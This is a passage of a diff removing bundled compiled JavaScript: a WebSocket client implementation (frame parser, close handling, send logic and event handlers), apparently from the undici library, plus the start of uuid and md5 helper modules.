this.#info.opcode - - this.#info.fragmented = !this.#info.fin && this.#info.opcode !== opcodes.CONTINUATION - - if (this.#info.fragmented && this.#info.opcode !== opcodes.BINARY && this.#info.opcode !== opcodes.TEXT) { - // Only text and binary frames can be fragmented - failWebsocketConnection(this.ws, 'Invalid frame type was fragmented.') - return - } - - const payloadLength = buffer[1] & 0x7F - - if (payloadLength <= 125) { - this.#info.payloadLength = payloadLength - this.#state = parserStates.READ_DATA - } else if (payloadLength === 126) { - this.#state = parserStates.PAYLOADLENGTH_16 - } else if (payloadLength === 127) { - this.#state = parserStates.PAYLOADLENGTH_64 - } - - if (this.#info.fragmented && payloadLength > 125) { - // A fragmented frame can't be fragmented itself - failWebsocketConnection(this.ws, 'Fragmented frame exceeded 125 bytes.') - return - } else if ( - (this.#info.opcode === opcodes.PING || - this.#info.opcode === opcodes.PONG || - this.#info.opcode === opcodes.CLOSE) && - payloadLength > 125 - ) { - // Control frames can have a payload length of 125 bytes MAX - failWebsocketConnection(this.ws, 'Payload length for control frame exceeded 125 bytes.') - return - } else if (this.#info.opcode === opcodes.CLOSE) { - if (payloadLength === 1) { - failWebsocketConnection(this.ws, 'Received close frame with a 1-byte body.') - return - } - - const body = this.consume(payloadLength) - - this.#info.closeInfo = this.parseCloseBody(false, body) - - if (!this.ws[kSentClose]) { - // If an endpoint receives a Close frame and did not previously send a - // Close frame, the endpoint MUST send a Close frame in response. (When - // sending a Close frame in response, the endpoint typically echos the - // status code it received.) - const body = Buffer.allocUnsafe(2) - body.writeUInt16BE(this.#info.closeInfo.code, 0) - const closeFrame = new WebsocketFrameSend(body) - - this.ws[kResponse].socket.write( - closeFrame.createFrame(opcodes.CLOSE), - (err) => { - if (!err) { - this.ws[kSentClose] = true - } - } - ) - } - - // Upon either sending or receiving a Close control frame, it is said - // that _The WebSocket Closing Handshake is Started_ and that the - // WebSocket connection is in the CLOSING state. - this.ws[kReadyState] = states.CLOSING - this.ws[kReceivedClose] = true - - this.end() - - return - } else if (this.#info.opcode === opcodes.PING) { - // Upon receipt of a Ping frame, an endpoint MUST send a Pong frame in - // response, unless it already received a Close frame. - // A Pong frame sent in response to a Ping frame must have identical - // "Application data" - - const body = this.consume(payloadLength) - - if (!this.ws[kReceivedClose]) { - const frame = new WebsocketFrameSend(body) - - this.ws[kResponse].socket.write(frame.createFrame(opcodes.PONG)) - - if (channels.ping.hasSubscribers) { - channels.ping.publish({ - payload: body - }) - } - } - - this.#state = parserStates.INFO - - if (this.#byteOffset > 0) { - continue - } else { - callback() - return - } - } else if (this.#info.opcode === opcodes.PONG) { - // A Pong frame MAY be sent unsolicited. This serves as a - // unidirectional heartbeat. A response to an unsolicited Pong frame is - // not expected. - - const body = this.consume(payloadLength) - - if (channels.pong.hasSubscribers) { - channels.pong.publish({ - payload: body - }) - } - - if (this.#byteOffset > 0) { - continue - } else { - callback() - return - } - } - } else if (this.#state === parserStates.PAYLOADLENGTH_16) { - if (this.#byteOffset < 2) { - return callback() - } - - const buffer = this.consume(2) - - this.#info.payloadLength = buffer.readUInt16BE(0) - this.#state = parserStates.READ_DATA - } else if (this.#state === parserStates.PAYLOADLENGTH_64) { - if (this.#byteOffset < 8) { - return callback() - } - - const buffer = this.consume(8) - const upper = buffer.readUInt32BE(0) - - // 2^31 is the maxinimum bytes an arraybuffer can contain - // on 32-bit systems. Although, on 64-bit systems, this is - // 2^53-1 bytes. - // https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Errors/Invalid_array_length - // https://source.chromium.org/chromium/chromium/src/+/main:v8/src/common/globals.h;drc=1946212ac0100668f14eb9e2843bdd846e510a1e;bpv=1;bpt=1;l=1275 - // https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/js-array-buffer.h;l=34;drc=1946212ac0100668f14eb9e2843bdd846e510a1e - if (upper > 2 ** 31 - 1) { - failWebsocketConnection(this.ws, 'Received payload length > 2^31 bytes.') - return - } - - const lower = buffer.readUInt32BE(4) - - this.#info.payloadLength = (upper << 8) + lower - this.#state = parserStates.READ_DATA - } else if (this.#state === parserStates.READ_DATA) { - if (this.#byteOffset < this.#info.payloadLength) { - // If there is still more data in this chunk that needs to be read - return callback() - } else if (this.#byteOffset >= this.#info.payloadLength) { - // If the server sent multiple frames in a single chunk - - const body = this.consume(this.#info.payloadLength) - - this.#fragments.push(body) - - // If the frame is unfragmented, or a fragmented frame was terminated, - // a message was received - if (!this.#info.fragmented || (this.#info.fin && this.#info.opcode === opcodes.CONTINUATION)) { - const fullMessage = Buffer.concat(this.#fragments) - - websocketMessageReceived(this.ws, this.#info.originalOpcode, fullMessage) - - this.#info = {} - this.#fragments.length = 0 - } - - this.#state = parserStates.INFO - } - } - - if (this.#byteOffset > 0) { - continue - } else { - callback() - break - } - } - } - - /** - * Take n bytes from the buffered Buffers - * @param {number} n - * @returns {Buffer|null} - */ - consume (n) { - if (n > this.#byteOffset) { - return null - } else if (n === 0) { - return emptyBuffer - } - - if (this.#buffers[0].length === n) { - this.#byteOffset -= this.#buffers[0].length - return this.#buffers.shift() - } - - const buffer = Buffer.allocUnsafe(n) - let offset = 0 - - while (offset !== n) { - const next = this.#buffers[0] - const { length } = next - - if (length + offset === n) { - buffer.set(this.#buffers.shift(), offset) - break - } else if (length + offset > n) { - buffer.set(next.subarray(0, n - offset), offset) - this.#buffers[0] = next.subarray(n - offset) - break - } else { - buffer.set(this.#buffers.shift(), offset) - offset += next.length - } - } - - this.#byteOffset -= n - - return buffer - } - - parseCloseBody (onlyCode, data) { - // https://datatracker.ietf.org/doc/html/rfc6455#section-7.1.5 - /** @type {number|undefined} */ - let code - - if (data.length >= 2) { - // _The WebSocket Connection Close Code_ is - // defined as the status code (Section 7.4) contained in the first Close - // control frame received by the application - code = data.readUInt16BE(0) - } - - if (onlyCode) { - if (!isValidStatusCode(code)) { - return null - } - - return { code } - } - - // https://datatracker.ietf.org/doc/html/rfc6455#section-7.1.6 - /** @type {Buffer} */ - let reason = data.subarray(2) - - // Remove BOM - if (reason[0] === 0xEF && reason[1] === 0xBB && reason[2] === 0xBF) { - reason = reason.subarray(3) - } - - if (code !== undefined && !isValidStatusCode(code)) { - return null - } - - try { - // TODO: optimize this - reason = new TextDecoder('utf-8', { fatal: true }).decode(reason) - } catch { - return null - } - - return { code, reason } - } - - get closingInfo () { - return this.#info.closeInfo - } -} - -module.exports = { - ByteParser -} - - -/***/ }), - -/***/ 7578: -/***/ ((module) => { - -"use strict"; - - -module.exports = { - kWebSocketURL: Symbol('url'), - kReadyState: Symbol('ready state'), - kController: Symbol('controller'), - kResponse: Symbol('response'), - kBinaryType: Symbol('binary type'), - kSentClose: Symbol('sent close'), - kReceivedClose: Symbol('received close'), - kByteParser: Symbol('byte parser') -} - - -/***/ }), - -/***/ 5515: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { kReadyState, kController, kResponse, kBinaryType, kWebSocketURL } = __nccwpck_require__(7578) -const { states, opcodes } = __nccwpck_require__(9188) -const { MessageEvent, ErrorEvent } = __nccwpck_require__(2611) - -/* globals Blob */ - -/** - * @param {import('./websocket').WebSocket} ws - */ -function isEstablished (ws) { - // If the server's response is validated as provided for above, it is - // said that _The WebSocket Connection is Established_ and that the - // WebSocket Connection is in the OPEN state. - return ws[kReadyState] === states.OPEN -} - -/** - * @param {import('./websocket').WebSocket} ws - */ -function isClosing (ws) { - // Upon either sending or receiving a Close control frame, it is said - // that _The WebSocket Closing Handshake is Started_ and that the - // WebSocket connection is in the CLOSING state. - return ws[kReadyState] === states.CLOSING -} - -/** - * @param {import('./websocket').WebSocket} ws - */ -function isClosed (ws) { - return ws[kReadyState] === states.CLOSED -} - -/** - * @see https://dom.spec.whatwg.org/#concept-event-fire - * @param {string} e - * @param {EventTarget} target - * @param {EventInit | undefined} eventInitDict - */ -function fireEvent (e, target, eventConstructor = Event, eventInitDict) { - // 1. If eventConstructor is not given, then let eventConstructor be Event. - - // 2. Let event be the result of creating an event given eventConstructor, - // in the relevant realm of target. - // 3. Initialize event’s type attribute to e. - const event = new eventConstructor(e, eventInitDict) // eslint-disable-line new-cap - - // 4. Initialize any other IDL attributes of event as described in the - // invocation of this algorithm. - - // 5. Return the result of dispatching event at target, with legacy target - // override flag set if set. - target.dispatchEvent(event) -} - -/** - * @see https://websockets.spec.whatwg.org/#feedback-from-the-protocol - * @param {import('./websocket').WebSocket} ws - * @param {number} type Opcode - * @param {Buffer} data application data - */ -function websocketMessageReceived (ws, type, data) { - // 1. If ready state is not OPEN (1), then return. - if (ws[kReadyState] !== states.OPEN) { - return - } - - // 2. Let dataForEvent be determined by switching on type and binary type: - let dataForEvent - - if (type === opcodes.TEXT) { - // -> type indicates that the data is Text - // a new DOMString containing data - try { - dataForEvent = new TextDecoder('utf-8', { fatal: true }).decode(data) - } catch { - failWebsocketConnection(ws, 'Received invalid UTF-8 in text frame.') - return - } - } else if (type === opcodes.BINARY) { - if (ws[kBinaryType] === 'blob') { - // -> type indicates that the data is Binary and binary type is "blob" - // a new Blob object, created in the relevant Realm of the WebSocket - // object, that represents data as its raw data - dataForEvent = new Blob([data]) - } else { - // -> type indicates that the data is Binary and binary type is "arraybuffer" - // a new ArrayBuffer object, created in the relevant Realm of the - // WebSocket object, whose contents are data - dataForEvent = new Uint8Array(data).buffer - } - } - - // 3. Fire an event named message at the WebSocket object, using MessageEvent, - // with the origin attribute initialized to the serialization of the WebSocket - // object’s url's origin, and the data attribute initialized to dataForEvent. - fireEvent('message', ws, MessageEvent, { - origin: ws[kWebSocketURL].origin, - data: dataForEvent - }) -} - -/** - * @see https://datatracker.ietf.org/doc/html/rfc6455 - * @see https://datatracker.ietf.org/doc/html/rfc2616 - * @see https://bugs.chromium.org/p/chromium/issues/detail?id=398407 - * @param {string} protocol - */ -function isValidSubprotocol (protocol) { - // If present, this value indicates one - // or more comma-separated subprotocol the client wishes to speak, - // ordered by preference. The elements that comprise this value - // MUST be non-empty strings with characters in the range U+0021 to - // U+007E not including separator characters as defined in - // [RFC2616] and MUST all be unique strings. - if (protocol.length === 0) { - return false - } - - for (const char of protocol) { - const code = char.charCodeAt(0) - - if ( - code < 0x21 || - code > 0x7E || - char === '(' || - char === ')' || - char === '<' || - char === '>' || - char === '@' || - char === ',' || - char === ';' || - char === ':' || - char === '\\' || - char === '"' || - char === '/' || - char === '[' || - char === ']' || - char === '?' || - char === '=' || - char === '{' || - char === '}' || - code === 32 || // SP - code === 9 // HT - ) { - return false - } - } - - return true -} - -/** - * @see https://datatracker.ietf.org/doc/html/rfc6455#section-7-4 - * @param {number} code - */ -function isValidStatusCode (code) { - if (code >= 1000 && code < 1015) { - return ( - code !== 1004 && // reserved - code !== 1005 && // "MUST NOT be set as a status code" - code !== 1006 // "MUST NOT be set as a status code" - ) - } - - return code >= 3000 && code <= 4999 -} - -/** - * @param {import('./websocket').WebSocket} ws - * @param {string|undefined} reason - */ -function failWebsocketConnection (ws, reason) { - const { [kController]: controller, [kResponse]: response } = ws - - controller.abort() - - if (response?.socket && !response.socket.destroyed) { - response.socket.destroy() - } - - if (reason) { - fireEvent('error', ws, ErrorEvent, { - error: new Error(reason) - }) - } -} - -module.exports = { - isEstablished, - isClosing, - isClosed, - fireEvent, - isValidSubprotocol, - isValidStatusCode, - failWebsocketConnection, - websocketMessageReceived -} - - -/***/ }), - -/***/ 4284: -/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { - -"use strict"; - - -const { webidl } = __nccwpck_require__(1744) -const { DOMException } = __nccwpck_require__(1037) -const { URLSerializer } = __nccwpck_require__(685) -const { getGlobalOrigin } = __nccwpck_require__(1246) -const { staticPropertyDescriptors, states, opcodes, emptyBuffer } = __nccwpck_require__(9188) -const { - kWebSocketURL, - kReadyState, - kController, - kBinaryType, - kResponse, - kSentClose, - kByteParser -} = __nccwpck_require__(7578) -const { isEstablished, isClosing, isValidSubprotocol, failWebsocketConnection, fireEvent } = __nccwpck_require__(5515) -const { establishWebSocketConnection } = __nccwpck_require__(5354) -const { WebsocketFrameSend } = __nccwpck_require__(5444) -const { ByteParser } = __nccwpck_require__(1688) -const { kEnumerableProperty, isBlobLike } = __nccwpck_require__(3983) -const { getGlobalDispatcher } = __nccwpck_require__(1892) -const { types } = __nccwpck_require__(3837) - -let experimentalWarned = false - -// https://websockets.spec.whatwg.org/#interface-definition -class WebSocket extends EventTarget { - #events = { - open: null, - error: null, - close: null, - message: null - } - - #bufferedAmount = 0 - #protocol = '' - #extensions = '' - - /** - * @param {string} url - * @param {string|string[]} protocols - */ - constructor (url, protocols = []) { - super() - - webidl.argumentLengthCheck(arguments, 1, { header: 'WebSocket constructor' }) - - if (!experimentalWarned) { - experimentalWarned = true - process.emitWarning('WebSockets are experimental, expect them to change at any time.', { - code: 'UNDICI-WS' - }) - } - - const options = webidl.converters['DOMString or sequence or WebSocketInit'](protocols) - - url = webidl.converters.USVString(url) - protocols = options.protocols - - // 1. Let baseURL be this's relevant settings object's API base URL. - const baseURL = getGlobalOrigin() - - // 1. Let urlRecord be the result of applying the URL parser to url with baseURL. - let urlRecord - - try { - urlRecord = new URL(url, baseURL) - } catch (e) { - // 3. If urlRecord is failure, then throw a "SyntaxError" DOMException. - throw new DOMException(e, 'SyntaxError') - } - - // 4. If urlRecord’s scheme is "http", then set urlRecord’s scheme to "ws". - if (urlRecord.protocol === 'http:') { - urlRecord.protocol = 'ws:' - } else if (urlRecord.protocol === 'https:') { - // 5. Otherwise, if urlRecord’s scheme is "https", set urlRecord’s scheme to "wss". - urlRecord.protocol = 'wss:' - } - - // 6. If urlRecord’s scheme is not "ws" or "wss", then throw a "SyntaxError" DOMException. - if (urlRecord.protocol !== 'ws:' && urlRecord.protocol !== 'wss:') { - throw new DOMException( - `Expected a ws: or wss: protocol, got ${urlRecord.protocol}`, - 'SyntaxError' - ) - } - - // 7. If urlRecord’s fragment is non-null, then throw a "SyntaxError" - // DOMException. - if (urlRecord.hash || urlRecord.href.endsWith('#')) { - throw new DOMException('Got fragment', 'SyntaxError') - } - - // 8. If protocols is a string, set protocols to a sequence consisting - // of just that string. - if (typeof protocols === 'string') { - protocols = [protocols] - } - - // 9. If any of the values in protocols occur more than once or otherwise - // fail to match the requirements for elements that comprise the value - // of `Sec-WebSocket-Protocol` fields as defined by The WebSocket - // protocol, then throw a "SyntaxError" DOMException. - if (protocols.length !== new Set(protocols.map(p => p.toLowerCase())).size) { - throw new DOMException('Invalid Sec-WebSocket-Protocol value', 'SyntaxError') - } - - if (protocols.length > 0 && !protocols.every(p => isValidSubprotocol(p))) { - throw new DOMException('Invalid Sec-WebSocket-Protocol value', 'SyntaxError') - } - - // 10. Set this's url to urlRecord. - this[kWebSocketURL] = new URL(urlRecord.href) - - // 11. Let client be this's relevant settings object. - - // 12. Run this step in parallel: - - // 1. Establish a WebSocket connection given urlRecord, protocols, - // and client. - this[kController] = establishWebSocketConnection( - urlRecord, - protocols, - this, - (response) => this.#onConnectionEstablished(response), - options - ) - - // Each WebSocket object has an associated ready state, which is a - // number representing the state of the connection. Initially it must - // be CONNECTING (0). - this[kReadyState] = WebSocket.CONNECTING - - // The extensions attribute must initially return the empty string. - - // The protocol attribute must initially return the empty string. - - // Each WebSocket object has an associated binary type, which is a - // BinaryType. Initially it must be "blob". - this[kBinaryType] = 'blob' - } - - /** - * @see https://websockets.spec.whatwg.org/#dom-websocket-close - * @param {number|undefined} code - * @param {string|undefined} reason - */ - close (code = undefined, reason = undefined) { - webidl.brandCheck(this, WebSocket) - - if (code !== undefined) { - code = webidl.converters['unsigned short'](code, { clamp: true }) - } - - if (reason !== undefined) { - reason = webidl.converters.USVString(reason) - } - - // 1. If code is present, but is neither an integer equal to 1000 nor an - // integer in the range 3000 to 4999, inclusive, throw an - // "InvalidAccessError" DOMException. - if (code !== undefined) { - if (code !== 1000 && (code < 3000 || code > 4999)) { - throw new DOMException('invalid code', 'InvalidAccessError') - } - } - - let reasonByteLength = 0 - - // 2. If reason is present, then run these substeps: - if (reason !== undefined) { - // 1. Let reasonBytes be the result of encoding reason. - // 2. If reasonBytes is longer than 123 bytes, then throw a - // "SyntaxError" DOMException. - reasonByteLength = Buffer.byteLength(reason) - - if (reasonByteLength > 123) { - throw new DOMException( - `Reason must be less than 123 bytes; received ${reasonByteLength}`, - 'SyntaxError' - ) - } - } - - // 3. Run the first matching steps from the following list: - if (this[kReadyState] === WebSocket.CLOSING || this[kReadyState] === WebSocket.CLOSED) { - // If this's ready state is CLOSING (2) or CLOSED (3) - // Do nothing. - } else if (!isEstablished(this)) { - // If the WebSocket connection is not yet established - // Fail the WebSocket connection and set this's ready state - // to CLOSING (2). - failWebsocketConnection(this, 'Connection was closed before it was established.') - this[kReadyState] = WebSocket.CLOSING - } else if (!isClosing(this)) { - // If the WebSocket closing handshake has not yet been started - // Start the WebSocket closing handshake and set this's ready - // state to CLOSING (2). - // - If neither code nor reason is present, the WebSocket Close - // message must not have a body. - // - If code is present, then the status code to use in the - // WebSocket Close message must be the integer given by code. - // - If reason is also present, then reasonBytes must be - // provided in the Close message after the status code. - - const frame = new WebsocketFrameSend() - - // If neither code nor reason is present, the WebSocket Close - // message must not have a body. - - // If code is present, then the status code to use in the - // WebSocket Close message must be the integer given by code. - if (code !== undefined && reason === undefined) { - frame.frameData = Buffer.allocUnsafe(2) - frame.frameData.writeUInt16BE(code, 0) - } else if (code !== undefined && reason !== undefined) { - // If reason is also present, then reasonBytes must be - // provided in the Close message after the status code. - frame.frameData = Buffer.allocUnsafe(2 + reasonByteLength) - frame.frameData.writeUInt16BE(code, 0) - // the body MAY contain UTF-8-encoded data with value /reason/ - frame.frameData.write(reason, 2, 'utf-8') - } else { - frame.frameData = emptyBuffer - } - - /** @type {import('stream').Duplex} */ - const socket = this[kResponse].socket - - socket.write(frame.createFrame(opcodes.CLOSE), (err) => { - if (!err) { - this[kSentClose] = true - } - }) - - // Upon either sending or receiving a Close control frame, it is said - // that _The WebSocket Closing Handshake is Started_ and that the - // WebSocket connection is in the CLOSING state. - this[kReadyState] = states.CLOSING - } else { - // Otherwise - // Set this's ready state to CLOSING (2). - this[kReadyState] = WebSocket.CLOSING - } - } - - /** - * @see https://websockets.spec.whatwg.org/#dom-websocket-send - * @param {NodeJS.TypedArray|ArrayBuffer|Blob|string} data - */ - send (data) { - webidl.brandCheck(this, WebSocket) - - webidl.argumentLengthCheck(arguments, 1, { header: 'WebSocket.send' }) - - data = webidl.converters.WebSocketSendData(data) - - // 1. If this's ready state is CONNECTING, then throw an - // "InvalidStateError" DOMException. - if (this[kReadyState] === WebSocket.CONNECTING) { - throw new DOMException('Sent before connected.', 'InvalidStateError') - } - - // 2. Run the appropriate set of steps from the following list: - // https://datatracker.ietf.org/doc/html/rfc6455#section-6.1 - // https://datatracker.ietf.org/doc/html/rfc6455#section-5.2 - - if (!isEstablished(this) || isClosing(this)) { - return - } - - /** @type {import('stream').Duplex} */ - const socket = this[kResponse].socket - - // If data is a string - if (typeof data === 'string') { - // If the WebSocket connection is established and the WebSocket - // closing handshake has not yet started, then the user agent - // must send a WebSocket Message comprised of the data argument - // using a text frame opcode; if the data cannot be sent, e.g. - // because it would need to be buffered but the buffer is full, - // the user agent must flag the WebSocket as full and then close - // the WebSocket connection. Any invocation of this method with a - // string argument that does not throw an exception must increase - // the bufferedAmount attribute by the number of bytes needed to - // express the argument as UTF-8. - - const value = Buffer.from(data) - const frame = new WebsocketFrameSend(value) - const buffer = frame.createFrame(opcodes.TEXT) - - this.#bufferedAmount += value.byteLength - socket.write(buffer, () => { - this.#bufferedAmount -= value.byteLength - }) - } else if (types.isArrayBuffer(data)) { - // If the WebSocket connection is established, and the WebSocket - // closing handshake has not yet started, then the user agent must - // send a WebSocket Message comprised of data using a binary frame - // opcode; if the data cannot be sent, e.g. because it would need - // to be buffered but the buffer is full, the user agent must flag - // the WebSocket as full and then close the WebSocket connection. - // The data to be sent is the data stored in the buffer described - // by the ArrayBuffer object. Any invocation of this method with an - // ArrayBuffer argument that does not throw an exception must - // increase the bufferedAmount attribute by the length of the - // ArrayBuffer in bytes. - - const value = Buffer.from(data) - const frame = new WebsocketFrameSend(value) - const buffer = frame.createFrame(opcodes.BINARY) - - this.#bufferedAmount += value.byteLength - socket.write(buffer, () => { - this.#bufferedAmount -= value.byteLength - }) - } else if (ArrayBuffer.isView(data)) { - // If the WebSocket connection is established, and the WebSocket - // closing handshake has not yet started, then the user agent must - // send a WebSocket Message comprised of data using a binary frame - // opcode; if the data cannot be sent, e.g. because it would need to - // be buffered but the buffer is full, the user agent must flag the - // WebSocket as full and then close the WebSocket connection. The - // data to be sent is the data stored in the section of the buffer - // described by the ArrayBuffer object that data references. Any - // invocation of this method with this kind of argument that does - // not throw an exception must increase the bufferedAmount attribute - // by the length of data’s buffer in bytes. - - const ab = Buffer.from(data, data.byteOffset, data.byteLength) - - const frame = new WebsocketFrameSend(ab) - const buffer = frame.createFrame(opcodes.BINARY) - - this.#bufferedAmount += ab.byteLength - socket.write(buffer, () => { - this.#bufferedAmount -= ab.byteLength - }) - } else if (isBlobLike(data)) { - // If the WebSocket connection is established, and the WebSocket - // closing handshake has not yet started, then the user agent must - // send a WebSocket Message comprised of data using a binary frame - // opcode; if the data cannot be sent, e.g. because it would need to - // be buffered but the buffer is full, the user agent must flag the - // WebSocket as full and then close the WebSocket connection. The data - // to be sent is the raw data represented by the Blob object. Any - // invocation of this method with a Blob argument that does not throw - // an exception must increase the bufferedAmount attribute by the size - // of the Blob object’s raw data, in bytes. - - const frame = new WebsocketFrameSend() - - data.arrayBuffer().then((ab) => { - const value = Buffer.from(ab) - frame.frameData = value - const buffer = frame.createFrame(opcodes.BINARY) - - this.#bufferedAmount += value.byteLength - socket.write(buffer, () => { - this.#bufferedAmount -= value.byteLength - }) - }) - } - } - - get readyState () { - webidl.brandCheck(this, WebSocket) - - // The readyState getter steps are to return this's ready state. - return this[kReadyState] - } - - get bufferedAmount () { - webidl.brandCheck(this, WebSocket) - - return this.#bufferedAmount - } - - get url () { - webidl.brandCheck(this, WebSocket) - - // The url getter steps are to return this's url, serialized. - return URLSerializer(this[kWebSocketURL]) - } - - get extensions () { - webidl.brandCheck(this, WebSocket) - - return this.#extensions - } - - get protocol () { - webidl.brandCheck(this, WebSocket) - - return this.#protocol - } - - get onopen () { - webidl.brandCheck(this, WebSocket) - - return this.#events.open - } - - set onopen (fn) { - webidl.brandCheck(this, WebSocket) - - if (this.#events.open) { - this.removeEventListener('open', this.#events.open) - } - - if (typeof fn === 'function') { - this.#events.open = fn - this.addEventListener('open', fn) - } else { - this.#events.open = null - } - } - - get onerror () { - webidl.brandCheck(this, WebSocket) - - return this.#events.error - } - - set onerror (fn) { - webidl.brandCheck(this, WebSocket) - - if (this.#events.error) { - this.removeEventListener('error', this.#events.error) - } - - if (typeof fn === 'function') { - this.#events.error = fn - this.addEventListener('error', fn) - } else { - this.#events.error = null - } - } - - get onclose () { - webidl.brandCheck(this, WebSocket) - - return this.#events.close - } - - set onclose (fn) { - webidl.brandCheck(this, WebSocket) - - if (this.#events.close) { - this.removeEventListener('close', this.#events.close) - } - - if (typeof fn === 'function') { - this.#events.close = fn - this.addEventListener('close', fn) - } else { - this.#events.close = null - } - } - - get onmessage () { - webidl.brandCheck(this, WebSocket) - - return this.#events.message - } - - set onmessage (fn) { - webidl.brandCheck(this, WebSocket) - - if (this.#events.message) { - this.removeEventListener('message', this.#events.message) - } - - if (typeof fn === 'function') { - this.#events.message = fn - this.addEventListener('message', fn) - } else { - this.#events.message = null - } - } - - get binaryType () { - webidl.brandCheck(this, WebSocket) - - return this[kBinaryType] - } - - set binaryType (type) { - webidl.brandCheck(this, WebSocket) - - if (type !== 'blob' && type !== 'arraybuffer') { - this[kBinaryType] = 'blob' - } else { - this[kBinaryType] = type - } - } - - /** - * @see https://websockets.spec.whatwg.org/#feedback-from-the-protocol - */ - #onConnectionEstablished (response) { - // processResponse is called when the "response’s header list has been received and initialized." - // once this happens, the connection is open - this[kResponse] = response - - const parser = new ByteParser(this) - parser.on('drain', function onParserDrain () { - this.ws[kResponse].socket.resume() - }) - - response.socket.ws = this - this[kByteParser] = parser - - // 1. Change the ready state to OPEN (1). - this[kReadyState] = states.OPEN - - // 2. Change the extensions attribute’s value to the extensions in use, if - // it is not the null value. - // https://datatracker.ietf.org/doc/html/rfc6455#section-9.1 - const extensions = response.headersList.get('sec-websocket-extensions') - - if (extensions !== null) { - this.#extensions = extensions - } - - // 3. Change the protocol attribute’s value to the subprotocol in use, if - // it is not the null value. - // https://datatracker.ietf.org/doc/html/rfc6455#section-1.9 - const protocol = response.headersList.get('sec-websocket-protocol') - - if (protocol !== null) { - this.#protocol = protocol - } - - // 4. Fire an event named open at the WebSocket object. - fireEvent('open', this) - } -} - -// https://websockets.spec.whatwg.org/#dom-websocket-connecting -WebSocket.CONNECTING = WebSocket.prototype.CONNECTING = states.CONNECTING -// https://websockets.spec.whatwg.org/#dom-websocket-open -WebSocket.OPEN = WebSocket.prototype.OPEN = states.OPEN -// https://websockets.spec.whatwg.org/#dom-websocket-closing -WebSocket.CLOSING = WebSocket.prototype.CLOSING = states.CLOSING -// https://websockets.spec.whatwg.org/#dom-websocket-closed -WebSocket.CLOSED = WebSocket.prototype.CLOSED = states.CLOSED - -Object.defineProperties(WebSocket.prototype, { - CONNECTING: staticPropertyDescriptors, - OPEN: staticPropertyDescriptors, - CLOSING: staticPropertyDescriptors, - CLOSED: staticPropertyDescriptors, - url: kEnumerableProperty, - readyState: kEnumerableProperty, - bufferedAmount: kEnumerableProperty, - onopen: kEnumerableProperty, - onerror: kEnumerableProperty, - onclose: kEnumerableProperty, - close: kEnumerableProperty, - onmessage: kEnumerableProperty, - binaryType: kEnumerableProperty, - send: kEnumerableProperty, - extensions: kEnumerableProperty, - protocol: kEnumerableProperty, - [Symbol.toStringTag]: { - value: 'WebSocket', - writable: false, - enumerable: false, - configurable: true - } -}) - -Object.defineProperties(WebSocket, { - CONNECTING: staticPropertyDescriptors, - OPEN: staticPropertyDescriptors, - CLOSING: staticPropertyDescriptors, - CLOSED: staticPropertyDescriptors -}) - -webidl.converters['sequence'] = webidl.sequenceConverter( - webidl.converters.DOMString -) - -webidl.converters['DOMString or sequence'] = function (V) { - if (webidl.util.Type(V) === 'Object' && Symbol.iterator in V) { - return webidl.converters['sequence'](V) - } - - return webidl.converters.DOMString(V) -} - -// This implements the propsal made in https://github.com/whatwg/websockets/issues/42 -webidl.converters.WebSocketInit = webidl.dictionaryConverter([ - { - key: 'protocols', - converter: webidl.converters['DOMString or sequence'], - get defaultValue () { - return [] - } - }, - { - key: 'dispatcher', - converter: (V) => V, - get defaultValue () { - return getGlobalDispatcher() - } - }, - { - key: 'headers', - converter: webidl.nullableConverter(webidl.converters.HeadersInit) - } -]) - -webidl.converters['DOMString or sequence or WebSocketInit'] = function (V) { - if (webidl.util.Type(V) === 'Object' && !(Symbol.iterator in V)) { - return webidl.converters.WebSocketInit(V) - } - - return { protocols: webidl.converters['DOMString or sequence'](V) } -} - -webidl.converters.WebSocketSendData = function (V) { - if (webidl.util.Type(V) === 'Object') { - if (isBlobLike(V)) { - return webidl.converters.Blob(V, { strict: false }) - } - - if (ArrayBuffer.isView(V) || types.isAnyArrayBuffer(V)) { - return webidl.converters.BufferSource(V) - } - } - - return webidl.converters.USVString(V) -} - -module.exports = { - WebSocket -} - - -/***/ }), - -/***/ 5840: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -Object.defineProperty(exports, "v1", ({ - enumerable: true, - get: function () { - return _v.default; - } -})); -Object.defineProperty(exports, "v3", ({ - enumerable: true, - get: function () { - return _v2.default; - } -})); -Object.defineProperty(exports, "v4", ({ - enumerable: true, - get: function () { - return _v3.default; - } -})); -Object.defineProperty(exports, "v5", ({ - enumerable: true, - get: function () { - return _v4.default; - } -})); -Object.defineProperty(exports, "NIL", ({ - enumerable: true, - get: function () { - return _nil.default; - } -})); -Object.defineProperty(exports, "version", ({ - enumerable: true, - get: function () { - return _version.default; - } -})); -Object.defineProperty(exports, "validate", ({ - enumerable: true, - get: function () { - return _validate.default; - } -})); -Object.defineProperty(exports, "stringify", ({ - enumerable: true, - get: function () { - return _stringify.default; - } -})); -Object.defineProperty(exports, "parse", ({ - enumerable: true, - get: function () { - return _parse.default; - } -})); - -var _v = _interopRequireDefault(__nccwpck_require__(8628)); - -var _v2 = _interopRequireDefault(__nccwpck_require__(6409)); - -var _v3 = _interopRequireDefault(__nccwpck_require__(5122)); - -var _v4 = _interopRequireDefault(__nccwpck_require__(9120)); - -var _nil = _interopRequireDefault(__nccwpck_require__(5332)); - -var _version = _interopRequireDefault(__nccwpck_require__(1595)); - -var _validate = _interopRequireDefault(__nccwpck_require__(6900)); - -var _stringify = _interopRequireDefault(__nccwpck_require__(8950)); - -var _parse = _interopRequireDefault(__nccwpck_require__(2746)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -/***/ }), - -/***/ 4569: -/***/ ((__unused_webpack_module, exports, __nccwpck_require__) => { - -"use strict"; - - -Object.defineProperty(exports, "__esModule", ({ - value: true -})); -exports["default"] = void 0; - -var _crypto = _interopRequireDefault(__nccwpck_require__(6113)); - -function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : { default: obj }; } - -function md5(bytes) { - if (Array.isArray(bytes)) { - bytes = Buffer.from(bytes); - } else if (typeof bytes === 'string') { - bytes = Buffer.from(bytes, 'utf8'); - } - - return _crypto.default.createHash('md5').update(bytes).digest(); -} - -var _default = md5; -exports["default"] = _default; - -/***/ }), - -/***/ 5332: -/***/ ((__unused_webpack_module, 